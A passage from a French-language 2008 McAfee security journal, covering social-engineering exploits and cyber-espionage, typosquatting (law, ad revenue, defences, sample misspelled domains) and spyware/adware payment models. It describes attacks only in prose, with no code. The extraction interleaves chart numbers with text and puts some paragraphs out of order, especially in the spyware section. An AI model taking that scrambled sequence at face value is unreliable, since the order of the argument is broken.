indiqué que certaines administrations recevaient des messages
électroniques contenant des fichiers malveillants au format
Word, PowerPoint ou Access. Il semble donc que l'association
entre ingénierie sociale et exploitation des vulnérabilités soit
désormais utilisée à des fins bien précises : l'espionnage.
L'espionnage est, par essence, bien plus difficile à détecter et à
contrecarrer que les attaques motivées par le simple appât du
gain. Il n'est pas rare que les vulnérabilités découvertes dans
ces documents malveillants soient des attaques de type « jour
zéro » : ces fichiers de données échappent donc encore plus
facilement à la vigilance, d'autant que les vulnérabilités qu'ils
recèlent ne sont souvent identifiées que lorsque le mal est fait.
Dans la mesure où ces attaques « jour zéro » ciblaient l'armée
ou l'administration, on peut émettre l'hypothèse qu'elles
ont pu être financées par des agents ou des Etats étrangers.
Techniques d'ingénierie sociale taillées sur mesure, vulnérabilités
« jour zéro », argent, pouvoir : on se croirait presque dans un
roman d'espionnage de John le Carré. Certains analystes en
sécurité considèrent toutefois que la réalité a rejoint la fiction.
De nombreux experts ont par ailleurs prédit que c'est dans
le cyberespace qu'éclateront les prochaines guerres. Tous ces
événements ne sont peut-être après tout que des coups d'essai,
dans la perspective d'une cyberguerre à venir ?
Piratage web furtif
Un domaine où les exploitations ont également évolué ces
dernières années est celui du piratage des serveurs web.
Auparavant, les auteurs d'attaques dégradaient les sites web
après les avoir piratés, laissant généralement leur marque sur le
site dans l'espoir de devenir célèbres. Ces pratiques ne sont plus,
en tout cas pour ce qui est des pirates de la nouvelle génération,
plus sophistiqués. Dans un contexte où les vulnérabilités de
logiciels clients sont légions, les pirates ont commencé à travailler
de manière systématique et coordonnée : ils commencent par
infiltrer des sites web populaires, puis y implantent ensuite
furtivement leurs logiciels malveillants, et trompent ensuite les
internautes par des manœuvres relevant de l'ingénierie sociale.
L'incident qui a eu lieu lors du Super Bowl (finale nationale de
football américain) en février 2007 en est un excellent exemple. Du
code JavaScript malveillant avait été introduit sur la page d'accueil
du site web officiel de l'évènement13. Ce script exploitait deux
failles présentes dans Internet Explorer et infectait les utilisateurs
dont le logiciel n'était pas à jour à l'aide d'un cheval de Troie
connecté à un serveur basé en Chine, permettant ainsi un accès
complet à l'ordinateur infecté. Des incidents identiques ont été
rapportés pour de nombreux sites web populaires, y compris des
ambassades, des groupes de discussion ou des entreprises.
Une autre menace émergente qui a rendu vulnérables des millions
de foyers fut l'exploitation de routeurs privés via la technologie
Universal Plug-and-Play. L'attaque consistait à permettre à une page
web intégrant un fichier Flash malveillant de reconfigurer le routeur
de l'utilisateur14. (Ce qui a rendu cette attaque possible est le fait
qu'une grande majorité d'internautes utilisent les mots de passe
par défaut sur leurs routeurs privés.) Une fois infecté, l'utilisateur
se voyait proposer, par le biais d'un lien a priori inoffensif, de payer
ses factures en ligne ou d'accéder à plus d'informations sur un sujet
susceptible de l'intéresser. Dans la plupart des cas, l'utilisateur ne se
doutait aucunement que son routeur avait été touché et que toutes
les informations transitant par celui-ci, y compris ses mots de passe,
étaient envoyées à un tiers.
Nouveaux vecteurs d'exploitation
Au début de la décennie, nous avons assisté à l'exploitation
intensive de failles et de vulnérabilités (chaînes de format, Stack
Overflow, Heap Overflow, Integer Overflow) par des attaques
qui étaient d'un point de vue strictement technique relativement
simples à mettre en œuvre. De nos jours, la plupart de ces attaques
fondées sur un simple dépassement de capacité de mémoire
de l'un ou l'autre composant ne sont cependant plus une réelle
menace pour les logiciels les plus courants, dont Windows,
grâce à l'amélioration des processus de développement et de
tests d'assurance qualité. De plus, des technologies comme la
randomisation de l'espace d'adressage (ASLR) ont forcé les pirates
à abandonner les mécanismes d'exploitation traditionnels.
L'exploitation de vulnérabilités est entrée dans une nouvelle ère.
Les concepts de pointeur NULL15 et de situation de concurrence16,
mais aussi le développement de techniques d'exploitation fiables
comme le « heap spray17 », se font de plus en plus populaires.
Beaucoup de ces bugs existent depuis longtemps mais avaient
toujours été considérés comme inexploitables.
NOTES
1 http://www.microsoft.com/technet/security/current.aspx
2 « How to Configure Memory Protection in Windows XP SP2 »
(Configuration de la protection de la mémoire dans Windows XP SP2) —
http://www.microsoft.com/technet/security/prodtech/windowsxp/depcnfxp.mspx
3 « Analysis of GS protections in Microsoft Windows Vista »
(Analyse des protections GS dans Microsoft Windows Vista) —
http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf
4 « Browser Fuzzing for fun and profit » (Le fuzzing de navigateurs, pour le plaisir
et pour l'argent) — http://blog.metasploit.com/2006/03/browser-fuzzing-for-fun-
and-profit.html
5 « Month of Browser Bugs » (Le mois des bugs des navigateurs) —
http://blog.metasploit.com/2006/07/month-of-browser-bugs.html
6 « AXFUZZ: An ActiveX/COM enumerator and fuzzer » (AXFUZZ : fuzzer et
énumérateur actif de code ActiveX et COM) — http://sourceforge.net/projects/axfuzz/
7 « Hamachi », H D Moore et Aviv Raff — http://metasploit.com/users/hdm/tools/
hamachi/hamachi.html
8 « 637 million Users Vulnerable to Attack » (637 millions d'utilisateurs vulnérables aux
attaques), Frequency X — http://blogs.iss.net/archive/TheWebBrowserThreat.html
9 « Keep your operating system updated: Frequently asked questions »
(Conservez votre système d'exploitation à jour : FAQ) —
http://www.microsoft.com/protect/computer/updates/faq.mspx
On pourrait croire que ces techniques arrivent à point nommé
pour tirer parti de l'ingénierie sociale comme vecteur d'attaque,
et ce pour plusieurs raisons :
t Il n'existe à l'heure actuelle aucune méthode fiable et
automatique permettant d'exécuter ces nouvelles techniques
(pour la propagation de masse notamment).
t Elles peuvent être facilement testées sur des individus ou des
groupes ciblés par le biais de techniques d'ingénierie sociale
dans le processus de développement.
t Associées à l'ingénierie sociale, elles offrent un retour sur
investissement bien plus important qu'en procédant à des
recherches supplémentaires dans le but d'une diffusion de masse.
Conclusion
Au vu des dernières tendances en matière de vulnérabilités,
l'ingénierie sociale est un phénomène contre lequel il est très
difficile de lutter. Quels que soient les mécanismes de protection
que les fournisseurs choisiront d'intégrer à leurs logiciels ou
systèmes d'exploitation, les techniques d'ingénierie sociale les
plus efficaces pourront les contourner tant que les utilisateurs
continueront à cliquer sur tous les liens qu'ils rencontrent. Il n'est
pas non plus question de compter à court terme sur une législation
du cyberespace pour combattre ces nouvelles techniques (sauf dans
le cas d'un dépôt de plainte pour fraude). Notre meilleure chance
de limiter les pertes et l'impact sur des victimes trop confiantes
réside essentiellement dans une meilleure éducation de l'utilisateur.
D'ici là, réfléchissez à deux fois avant de cliquer sur un lien
pour « accepter » le prix formidable que vous avez
prétendument remporté.
Rahul Kashyap dirige les services de Recherche sur
les vulnérabilités et de Prévention des intrusions au
sein de McAfee Avert Labs. Il est ainsi responsable
des études sur les vulnérabilités, des analyses des
attaques « jour zéro », du contenu des systèmes
de prévention des intrusions et des procédures
de réaction d'urgence. Kashyap est également un
grand fan du personnage de bande dessinée Dilbert
et espère un jour pouvoir créer sa propre série sur la
vie d'un expert en sécurité.
10 « MS Office Flaws Ideal Tools for Targeted Attacks » (Les failles de MS Office sont
des outils idéaux pour les attaques ciblées) — http://blog.washingtonpost.com/
securityfix/2006/04/ms_office_flaws_ideal_tools_fo_1.html
11 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows/
12 « The New E-spionage Threat » (Cyberespionnage : la nouvelle menace) —
http://www.businessweek.com/print/magazine/content/08_16/b4080032218430.htm
13 « Dolphins' Web sites hacked in advance of Super Bowl » (Sites web des
Dolphins piratés en prévision du Super Bowl) — http://www.networkworld.com/
news/2007/020207-dolphins-web-sites-hacked-in.html
14 « Hacking the interwebs » (Piratage Internet), 12 janvier 2008 —
http://www.gnucitizen.org/blog/hacking-the-interwebs/
15 « Application-Specific Attacks: Leveraging the ActionScript Virtual Machine »
(Attaques ciblées sur des applications : exploitation de la machine virtuelle
ActionScript) — http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf
16 « Unusual Bugs » (Des bugs pas comme les autres), Ilja van Sprundel —
http://www.ruxcon.org.au/files/2006/unusual_bugs.pdf
17 « Heap Feng Shui in JavaScript » (Feng Shui et Heap Overflow dans JavaScript) —
http://www.determina.com/security.research/presentations/bh-eu07/
bh-eu07-sotirov-paper.html (Inscription obligatoire)
AUTOMNE 2008 33
Les itinéraires
inattendus de
la navigation
sur Internet
Benjamin Edelman
Une simple navigation innocente sur Internet peut vous exposer aux
nombreuses attaques décrites dans ce McAfee Security Journal.
Des bannières malveillantes aux logiciels publicitaires groupés, les sites
que vous avez l'intention de visiter peuvent se révéler très dangereux.
Méfiez-vous toutefois aussi des sites que vous n'aviez aucunement
prévu de consulter, mais sur lesquels vous tombez par accident.
Stratégie de base
Pour ceux d'entre nous qui sont parfois imprécis lorsqu'ils
saisissent une URL, il existe un type particulier de menace dont
ils doivent se méfier. Ce fléau, touchant principalement les
spécialistes des fautes de frappe, est appelé le « typosquatting »
— de « typo », faute de frappe, et « squat », prendre abusivement
possession d'un local vacant. La stratégie du typosquatteur
consiste à anticiper les fautes de frappe pouvant être commises.
Imaginez qu'en voulant saisir « bankofamerica.com », un
utilisateur tape deux fois sur la touche « k » et omette le « e »,
entrant ainsi l'adresse « bankkofamrica.com ». Ce type de coquille
entraînerait normalement un message d'erreur du navigateur et un
renvoi vers le site officiel de Bank of America. Imaginez maintenant
qu'un typosquatteur ait anticipé cette erreur. Rien ne l'empêche en
effet d'enregistrer un nom de domaine sur la base d'une mauvaise
orthographe (ou autres approximations) dans l'espoir que des
utilisateurs peu attentifs y atterrissent.
A l'origine, les typosquatteurs exploitaient principalement les
coquilles, qu'il s'agisse de caractères supplémentaires, manquants
ou inversés. Depuis peu, ils font également appel à de nouvelles
méthodes peu orthodoxes pour récupérer tout ce trafic non
intentionnel. Un typosquatteur peut en effet enregistrer le nom
de domaine « wwwmcafee.com », ce qui dirigerait vers son site
tout utilisateur omettant le point séparant les trois w du nom de
domaine dans l'URL « www.mcafee.com ». (Pour l'anecdote, ceci
est réellement arrivé. McAfee fait en ce moment le nécessaire pour
récupérer ce nom de domaine.) Dans le cas des points de séparation,
les typosquatteurs anticipent à juste titre le comportement des
34 McAFEE SECURITY JOURNAL
navigateurs, qui ajoutent automatiquement le suffixe « .com » aux
noms de domaine sans domaine de premier niveau, et enregistrent
ainsi des adresses de type « www.mcafeecom.com ». D'autres
typosquatteurs préfèrent concentrer leurs efforts sur les préfixes
de type « http » ou enregistrer les domaines .com pour les sites
résidant justement dans d'autres domaines de premier niveau.
Comment les utilisateurs sont-ils amenés sur ces sites détournés ?
Certains utilisateurs oublient l'orthographe exacte de l'adresse d'un
site, d'autres font des fautes de frappe. (Cela est particulièrement
vrai pour les utilisateurs ne parlant pas ou peu anglais, les
personnes ayant des problèmes de vue ou encore ceux qui ne sont
pas tout à fait à l'aise avec un clavier.) Les utilisateurs débutants
peuvent ne pas connaître la syntaxe correcte de l'adresse d'un
site web, tandis que les plus pressés commettent des erreurs
d'inattention. Même les utilisateurs les plus chevronnés ne sont
pas à l'abri d'une erreur lorsqu'ils saisissent une URL à partir du
minuscule clavier d'un téléphone portable ou d'une tablette avec
reconnaissance d'écriture manuscrite, ou encore lorsqu'ils se
trouvent en voiture sur une route accidentée. On ne peut ainsi en
vouloir à personne d'entrer une adresse erronée et de se retrouver
sur un site utilisant une technique de typosquatting. Au contraire
d'ailleurs, car bien qu'il soit certain que ces sites sont visités par de
nombreux utilisateurs, c'est généralement à la suite d'une erreur.
Etendue du phénomène
Comptant sur la part importante d'utilisateurs commettant
des erreurs, le typosquatting s'est développé de manière
remarquable. Le service McAfee SiteAdvisor® réalise en
permanence des recherches sur les typosquatteurs. L'étude
réalisée par McAfee Avert Labs en mai 2008 a répertorié plus de
80 000 domaines de typosquatting dérivés des 2 000 sites web
les plus populaires. Et plus on creuse, plus on se rend compte de
l'ampleur du phénomène.
Les sites web fréquentés par les enfants sont des cibles
particulièrement privilégiées des typosquatteurs. Une analyse
récente a par exemple démontré que 327 sites de typosquatting
dérivés de « cartoonnetwork.com » avaient déjà été enregistrés.
Dans la liste établie par SiteAdvisor, « Freecreditreport.com »
arrivait en tête des sites détournés, suivi par des sites tels que
YouTube, Craigslist, Wikipedia ou Bank of America. (La figure 1
propose quelques données statistiques. Pour des exemples de
détournements orthographiques, voir l'annexe.)
Recours légaux
Quelles que soient ses formes, le typosquatting est une pratique
illégale aux Etats-Unis. La loi de protection des utilisateurs
contre le cybersquattage (ACPA) de 1999 (15 USC §1125(d))
interdit l'enregistrement, le trafic et l'utilisation de noms de
domaine identiques ou d'une similarité portant à confusion
avec des marques ou des noms connus. L'ACPA prévoit des
dommages à hauteur des profits engendrés de manière illicite
par le typosquatteur incriminé (15 USC §1117(a)(1)), ou allant de
1 000 $ à 100 000 $ par domaine de typosquatting répertorié (à
la discrétion du tribunal) (§1117(d)).
Certains pays bénéficient d'une législation quelque peu différente
en matière de typosquatting, mais la plupart d'entre eux
considèrent cette pratique comme une violation des droits de
marque et l'interdisent de fait. En outre, la Politique uniformisée
NOMBRE DE DOMAINES
DOMAINE DE TYPOSQUATTING
freecreditreport.com
cartoonnetwork.com
youtube.com
craigslist.org
blogspot.com
clubpenguin.com
wikipedia.com
runescape.com
miniclip.com
bankofamerica.com
dailymotion.com
metroflog.com
addictinggames.com
friendster.com
myspace.com
verizonwireless.com
facebook.com
Figure 1 : Liste des sites les plus touchés par le typosquatting. Ce tableau répertorie
les marques les plus détournées par les typosquatteurs. Ces données sont tirées de
l'étude des analyses SiteAdvisor en mai 2008.
de résolution de litiges en matière de noms de domaine
(UDRP, Uniform Domain Name Dispute Resolution Policy)
permet un arbitrage pour régler les plaintes éventuelles.
Pour enregistrer un site sur un domaine de premier niveau
important, l'abonné doit accepter la juridiction de l'UDRP,
ce qui signifie que cette politique s'applique quel que soit le
pays où se trouve le domaine de typosquatting. Toutefois, les
recours de l'UDRP sont limités à la confiscation du domaine
mis en cause, sans paiement de dommages éventuels.
Bien que l'ACPA prévoie d'importantes pénalités, les
typosquatteurs semblent avoir déjà compris que leur
application est peu probable. Ainsi, malgré la menace de
lourdes sanctions financières, les typosquatteurs continuent
à œuvrer en toute impunité.
Stratégie financière des typosquatteurs
Dès qu'un utilisateur arrive sur un site de typosquatting,
son propriétaire met tout en œuvre pour gagner le plus
d'argent possible.
Il y a quelques années, le célèbre typosquatteur John
Zuccarini imposait à ses innocents visiteurs l'affichage de
sites web pour adultes. Zuccarini avait enregistré pas moins
de 8 000 domaines différents, comme j'ai pu le décrire dans
une précédente étude1. Celui-ci ne s'en est finalement pas
tiré à si bon compte : en septembre 2003, Zuccarini a été
arrêté pour violation de la loi sur l'intégrité des noms de
domaines (Truth in Domain Names Act), interdisant toute
action utilisant un nom de domaine trompeur dans le but
d'amener une personne à visualiser des contenus obscènes.
742
L'approche usuelle des typosquatteurs repose désormais sur
327
la publicité. Parmi les milliers de domaines de typosquatting
320 que j'ai pu étudier ces dernières années, il est rare d'en
318 rencontrer un qui n'affiche aucune publicité.
276
271
266
264
Le service McAfee SiteAdvisor réalise
263
en permanence des recherches sur les
251
typosquatteurs. L'étude réalisée par McAfee
250
Avert Labs en mai 2008 a répertorié plus de
249
80 000 domaines de typosquatting dérivés
248
246
des 2 000 sites web les plus populaires.
239
238
235
AUTOMNE 2008 35

Lorsque ces sites en présentent, les publicités ont généralement
été sélectionnées pour leur pertinence vis-à-vis du contenu
que l'utilisateur souhaitait vraisemblablement consulter. Si l'on
reprend l'exemple de bankkofamrica.com cité précédemment, on
peut s'attendre à ce que les publicités proposées concernent des
services bancaires. Oui, mais lesquels ? Avant tout bien sûr, on
devrait trouver Bank of America (voir figure 2). Pas de surprise,
donc. D'un côté, cette publicité s'avère bénéfique pour Bank
of America : elle parvient quand même à toucher l'utilisateur,
malgré la faute de frappe empêchant la prise de contact initiale.
D'autre part, il est assez incroyable qu'un typosquatteur fasse
payer Bank of America la possibilité de toucher un client qui
souhaitait volontairement se rendre sur leur site. Après tout, ce
typosquatteur ne fait rien d'autre que violer les droits de marque
de Bank of America ; il se rend ainsi coupable d'une infraction
à l'ACPA, selon laquelle il est interdit d'enregistrer des noms de
36 McAFEE SECURITY JOURNAL
Figure 2 : Un typosquatteur
a enregistré un nom de
domaine proche de celui d'une
banque connue, puis fait payer
(indirectement) ses espaces
publicitaires à cette même
banque et à d'autres.
domaine de ce type et ce typosquatteur devrait même payer
d'importants dommages et intérêts à Bank of America si celle-ci
portait plainte. Etonnamment, on constate que ce typosquatteur
facture en fait de l'espace publicitaire à Bank of America, dont on
peut supposer, au moins à l'origine, qu'elle n'était pas consciente
de cette entourloupe.
Comment cela est-il possible ? En fait, les typosquatteurs ne
vendent pas directement leur espace publicitaire aux annonceurs.
(Imaginez la scène : « Bonjour, seriez-vous intéressés par un
espace publicitaire sur notre site de typosquatting ? – Pardon ?? »)
Concrètement, les typosquatteurs vendent leurs services aux
réseaux publicitaires, qui eux-mêmes recherchent des annonceurs.
Le plus grand réseau de ce type est Google, dont le produit
AdSense for Domains et autres services de syndication pour
domaines gèrent, d'après les données relevées par SiteAdvisor, les
publicités de plus de 80 % des sites de typosquatting.
Evolution du phénomène
En juin 2008, l'ICANN (Internet Corporation for Assigned Names
and Numbers) a voté l'accélération du processus de création
de nouveaux domaines de premier niveau. Outre les domaines
familiers à la plupart des internautes, il existe déjà certains
domaines moins connus comme .info, .biz, .museum et .travel.
Nous pourrons bientôt compter avec de nouveaux domaines,
tels que .nyc ou .lib (comme certains ont pu le suggérer).
Ces nouveaux domaines représentent bien évidemment de
nouvelles opportunités pour les typosquatteurs, qu'ils choisissent
d'enregistrer de vrais noms de marques avec ces nouveaux
domaines ou misent sur d'autres erreurs typographiques. Lorsque
les utilisateurs demanderont l'accès à des sites sur ces domaines,
leurs erreurs les propulseront directement dans le giron des
typosquatteurs, déjà prêts à les accueillir avec leurs sites détournés.
Certains indices laissent cependant penser que le typosquatting
pourrait connaître une perte de vitesse. D'une part, certains sites
web importants ont mis en place des mesures de protection contre
les typosquatteurs, à la fois pour eux-mêmes et pour leurs clients.
Par exemple, en 2006 Neiman Marcus a porté plainte contre la
société d'enregistrement de noms de domaine Dotster. Neiman
Marcus accusait Dotster d'avoir enregistré un grand nombre de
domaines portant atteinte aux marques de Neiman Marcus, et de
profiter des publicités affichées pour tirer d'importants bénéfices
de ces sites détournés. Neiman Marcus considérait que l'implication
de Dotster ne se limitait pas à l'enregistrement simple de ces
domaines, dans la mesure où la société choisissait les domaines
qu'elle enregistrait et tirait un avantage pécuniaire des publicités
diffusées sur ces sites. L'affaire fut classée en 2007 selon des
modalités confidentielles. Depuis, Neiman Marcus s'est attaqué à
d'autres importants squatteurs. (Pour information, j'ai eu l'occasion
de conseiller Neiman Marcus pour certaines de ces affaires.) Verizon
et Microsoft se sont également montrés vigilants dans des affaires
semblables. D'un côté, ce type de procès n'est pas particulièrement
courant. Toutefois, les dommages et intérêts prévus par l'ACPA, soit
un minimum de 1 000 dollars par domaine, peuvent représenter
des sommes importantes dans le cas de violations à grande échelle.
A elle seule, la société Microsoft a reçu plus de deux millions de
dollars dans le cadre d'affaires de typosquatting.
Certaines rumeurs persistances indiquent que de grands réseaux
publicitaires, Google notamment, pourraient se détourner de
l'industrie du typosquatting. Une affaire récente portée en action
collective a dénoncé le rôle de Google dans le financement de
ce secteur, et les publicités tirant parti du typosquatting ont été
à l'origine de nombreuses plaintes impliquant annonceurs et
propriétaires de marques. Si Google cessait tout financement
NOTES
1 « Large-Scale Registration of Domains with Typographical Errors »
(Enregistrement à grande échelle de noms de domaine contenant des erreurs
typographiques), janvier 2003, Harvard Law School —
http://cyber.law.harvard.edu/archived_content/people/edelman/typo-domains/
de cette pratique, les typosquatteurs seraient nettement moins
motivés par l'enregistrement de domaines détournés, dans la
mesure où aucun autre réseau publicitaire ne les rémunèrerait
aussi grassement que Google. (Pour information, j'interviens en
tant que conseiller dans le procès Vulcan Golf contre Google,
affaire pour violation des droits de marque portée en action
collective traitant de la responsabilité de Google dans les sites de
typosquatting où Google achète des espaces publicitaires.)
Moyens de défense
Bien que la lutte contre le typosquatting continue, les
internautes ont de nombreux moyens de protection à leur
portée. Le plus important : être attentif à ce que l'on tape.
Méfiez-vous du typosquatting, surtout lorsque l'adresse d'un
site est particulièrement difficile à orthographier. Si vous
ne connaissez pas un nom de domaine, n'essayez pas de le
deviner ; passez plutôt par un moteur de recherche.
Ensuite, une fois arrivé sur un site, soyez vigilant. S'agit-il bien
du site que vous souhaitiez visiter ? Le lien est-il bien un pointeur
ordinaire, ou s'agit-il d'une annonce publicitaire ? Le site d'une
administration publique devrait-il vraiment être en .com ? Ne
devriez-vous pas plutôt consulter un site en .gov ? Avec un peu
de sens critique, vous pourrez vous défendre efficacement contre
le typosquatting et d'autres menaces du même type.
Certains logiciels spécialisés peuvent également permettre de
bénéficier d'une protection contre les typosquatteurs. SiteAdvisor
reconnaît de nombreux sites de ce type. Un service de résolution
des erreurs de frappe, comme OpenDNS, vous assure une
protection supplémentaire. Les moteurs de recherche sont eux
aussi utiles, puisqu'ils proposent le plus souvent de corriger les
fautes les plus plausibles : vous pouvez ainsi éviter de nombreux
sites de typosquatting en effectuant des recherches plutôt qu'en
tapant directement un nom de domaine directement dans la
barre d'adresse de votre navigateur.
Benjamin Edelman est maître assistant à la
Harvard Business School, où il étudie les sites
de marché électroniques et la fraude en ligne. Il
est également conseiller spécial pour le service
SiteAdvisor de McAfee, proposant un point de vue
extérieur aux évaluations de sites effectuées par
SiteAdvisor. Et même si sa technique de frappe est
généralement irréprochable, le professeur Edelman
a parfois lui aussi emprunté les chemins de traverse
de la navigation Internet.
ANNEXE
Exemples de sites de typosquatting : Cartoonnetwork.com
Parmi les 80 000 domaines analysés en mai 2008 par SiteAdvisor, nous avons
identifié les variations suivantes du domaine « cartoonnetwork.com » :
ccartoonnetwork.com ckartoonnetwork.com cairtoonnetwork.com
dcartoonnetwork.com jcartoonnetwork.com cuartoonnetwork.com
ncartoonnetwork.com vcartoonnetwork.com acartoonnetwork.com
cfartoonnetwork.com caertoonnetwork.com bcartoonnetwork.com
ceartoonnetwork.com caortoonnetwork.com canrtoonnetwork.com
AUTOMNE 2008 37
Qu'est-il donc arrivé
aux logiciels espions
et aux logiciels
publicitaires ?
Aditya Kapoor
Les logiciels espions et publicitaires font partie des outils les plus
utilisés pour la publicité et le marketing en ligne.
Ces applications sont souvent utilisées dans le cadre de techniques
d'ingénierie sociale et phagocytent généralement des logiciels
gratuits (freewares) ou à contribution volontaire (sharewares), par
ailleurs très utiles, téléchargés par les internautes. Ces applications
indésirables sont d'ailleurs fournies avec des contrats de licence
censés définir les limites de leur comportement. Ceux-ci sont
toutefois rarement explicites et utilisables, trompant l'utilisateur et
laissant le champ libre aux pièges de l'ingénierie sociale.
Au début de la décennie, les logiciels espions (spywares) et les
logiciels publicitaires (adwares), souvent appelés « programmes
potentiellement indésirables », ont vu leur nombre augmenter
de manière exponentielle. Après 2005, on a cependant assisté à
un déclin constant de ce nombre. Dans le présent article, nous
étudierons les principaux changements survenus dans les modèles
de compensation en ligne qui ont joué un rôle important dans
cette diminution. Les logiciels espions et logiciels publicitaires sont
répartis en deux catégories bien distinctes : l'une comprend des
applications plus saines et des modèles plus élaborés nécessitant
l'approbation de l'utilisateur, développés par des acteurs clés
dans le domaine des logiciels publicitaires ; l'autre comprend des
logiciels parfois malveillants et souvent définis comme étant des
chevaux de Troie. Cette distinction relativement claire a permis de
limiter le nombre des logiciels espions et des logiciels publicitaires.
Cependant, si ces programmes potentiellement indésirables ne
représentent plus une réelle menace, peut-on espérer les voir
disparaître à tout jamais ? Pour répondre à cette question, nous
étudierons les changements qui ont eu lieu dans le paysage des
menaces, ainsi que le rôle des techniques d'ingénierie sociale.
Définitions
Les termes logiciel publicitaire (adware) et logiciel espion
(spyware) sont souvent utilisés de manière approximative ou
comme s'ils étaient synonymes, ce qui entretient souvent la
confusion. Pour plus de clarté, nous avons choisi d'utiliser les
définitions établies par l'Anti-Spyware Coalition (ASC)1.
38 McAFEE SECURITY JOURNAL
t Logiciel publicitaire Il s'agit d'un type de programme de
diffusion de publicités, dont l'objectif premier est de diffuser
du contenu publicitaire, mais selon des procédés et dans
des contextes généralement inattendus et non souhaités par
l'utilisateur. Le modèle de risque défini par l'ASC décrit en
détail divers comportements pouvant être considérés comme
inattendus ou indésirables. De nombreuses applications
publicitaires disposent également de fonctions de suivi et
peuvent, à ce titre, être qualifiées de technologies de suivi. Il
est possible que certains utilisateurs veuillent supprimer des
logiciels publicitaires s'ils sont opposés à ce type de suivi, qu'ils
ne souhaitent pas voir s'afficher les publicités proposées par
ces programmes ou qu'ils sont incommodés par leurs effets
sur les performances de leur système. A l'inverse, il est possible
que d'autres désirent conserver des logiciels publicitaires bien
précis s'ils leur permettent de réduire le coût d'un produit ou
d'un service particulier, ou si le contenu publicitaire proposé
leur semble utile et pertinent, comme des publicités sur des
produits concurrents ou complémentaires à ceux qu'il détient.
t Logiciel espion Stricto sensu, cette expression désigne un
logiciel de suivi déployé sans que l'utilisateur en soit averti,
sans son consentement et sans qu'il en ait la maîtrise. Au
sens large, les logiciels espions correspondent à ce que l'ASC
qualifie de « Spywares et autres technologies potentiellement
indésirables ». En d'autres mots, des technologies déployées
sans le consentement préalable de l'utilisateur ou mises en
œuvre de manière à limiter le contrôle de l'utilisateur sur :
– des modifications importantes affectant l'utilisation, la
confidentialité ou la sécurité du système ;
– l'utilisation des ressources système, y compris les
applications installées ;
– la collecte, l'exploitation et la diffusion de données
personnelles ou sensibles.
Conscients que le terme générique de « logiciel espion » s'est
grandement éloigné de son sens d'origine, les membres de l'ASC
ont décidé de l'utiliser (au sens propre) pour les documents
techniques. Conscients également du fait qu'il est impossible
d'éviter les connotations associées à ce terme dans l'usage
courant, l'ASC prend note de l'acception générale du terme
comme incluant l'ensemble des programmes potentiellement
indésirables. Dans le présent article, le terme logiciel espion ne
sera jamais utilisé au sens large, mais toujours au sens propre,
désignant ainsi un logiciel utilisé à des fins de marketing. Pour les
programmes espions au sens strict, comme les enregistreurs de
frappe, nous utiliserons le terme logiciels de surveillance.
Un démarrage fulgurant
Les logiciels espions et logiciel publicitaires ont attiré notre
attention au cours de l'année 2000 avec l'apparition d'Adware-
Aureate, qui utilisait l'historique de navigation de l'utilisateur
pour diffuser des publicités. Cet événement a entraîné la création
de l'une des premières applications de protection antispyware :
OptOut, par la Gibson Research Corporation2.
Ces logiciels ont connu leur essor fin 2004 et ont vu leur nombre
exploser en 2005 (voir figures 1 et 2). Leur premier objectif
était de générer des profits en étant installés sur des millions
d'ordinateurs (selon le modèle avec paiement à l'installation) mais
aussi en affichant des publicités (dans le cadre d'un paiement au
clic). L'industrie des logiciels espions et des logiciels publicitaires a
prospéré ces trois dernières années grâce aux importants revenus
générés par la publicité. Chaque fois qu'un utilisateur cliquait sur
une publicité, la société émettrice recevait une commission.
Au fur et à mesure que le trafic et sa rémunération augmentent,
Paul décide d'utiliser un exploit afin d'installer ce logiciel publicitaire
sans que l'utilisateur en ait conscience. De nombreuses applications
de ce type affichent un contrat de licence avant l'installation.
Considérant que cela ne ferait qu'apeurer les visiteurs, Paul décide
de modifier l'application de manière à empêcher l'affichage de ce
contrat afin de multiplier le nombre d'installations. Si Paul s'avère
être un pirate chevronné, il pourra reproduire ce modèle sur des
milliers de sites web infectés et décupler de manière exponentielle
aussi bien le nombre d'installations que sa propre rémunération.
Benjamin Edelman, également auteur pour McAfee Security
Journal, décrit un scénario similaire sur son site web5.
Le modèle de compensation avec paiement à l'installation
s'est avéré très lucratif pour les programmeurs et les personnes
malintentionnées, ce qui a contribué à la croissance exceptionnelle
du nombre de logiciels espions et de logiciels publicitaires. Dans ce
modèle, de nombreux vecteurs d'installation sont utilisés. Ceux-ci
peuvent être classés en deux catégories distinctes :
t Ingénierie sociale Cette technique nécessite l'intervention
de l'utilisateur non seulement dans l'installation d'un logiciel,
mais parfois aussi dans sa diffusion. Le nombre de méthodes
d'ingénierie sociale n'a de limite que l'imagination des auteurs
d'attaques, qui parviennent d'ailleurs souvent à tromper les
utilisateurs les plus avertis. Pour reprendre l'exemple de Paul
Dupont, la perspective d'obtenir gratuitement des jeux ou des
sonneries téléphoniques est une tentation à laquelle peu de
personnes savent résister. Quoi qu'il en soit, c'est à l'utilisateur
de décider s'il accepte de prendre des risques ou de laisser aux
autres tous ces cadeaux qu'on lui propose gratuitement.

Modèles de compensation et mises en garde Logiciels

5 000 publicitaires

Les logiciels espions et logiciels publicitaires font appel à 4 000

deux modèles de compensation différents pour la publicité 3 000
en ligne. Dans un monde idéal, ces modèles fonctionneraient
2 000
parfaitement, mais quelle est réellement la situation dans un
monde où existent des personnes malintentionnées ? Examinons 1 000
un instant comment ces modèles peuvent être exploités. 0
2000 2001 2002 2003 2004 2005 2006 2007 2008
Paiement à l'installation : le modèle côté client3 (estimation)

Selon le modèle avec paiement à l'installation, des sociétés Figure 1 : Le nombre de logiciels publicitaires a atteint son apogée en 2005.
marchandes et de services paient des fournisseurs de logiciels (Source : McAfee Avert Labs)
publicitaires pour diffuser leurs annonces. Ces derniers font à
leur tour appel à des partenaires ou à des sociétés affiliées pour Logiciels espions et logiciels de surveillance
300
distribuer leurs logiciels publicitaires, notamment en les combinant
à d'autres applications. (Aux Etats-Unis par exemple, ZangoCash 250
paie entre 0,75 et 1,45 dollar pour chaque installation de son 200
logiciel publicitaire4.) Il ne reste alors plus qu'à attendre que le
150
logiciel soit installé sur l'ordinateur d'un utilisateur.
100
Selon ce modèle, un paramètre d'identification particulier est
utilisé pour détecter les installations effectuées. Ainsi, si Paul 50
Dupont héberge sur son site web le programme d'installation 0
d'un logiciel publicitaire avec paiement à l'installation, et qu'un 2000 2001 2002 2003 2004 2005 2006 2007 2008
utilisateur télécharge et installe ce logiciel via le site de Paul, (estimation)
ce dernier percevra une rémunération définie. Pour augmenter Logiciels espions
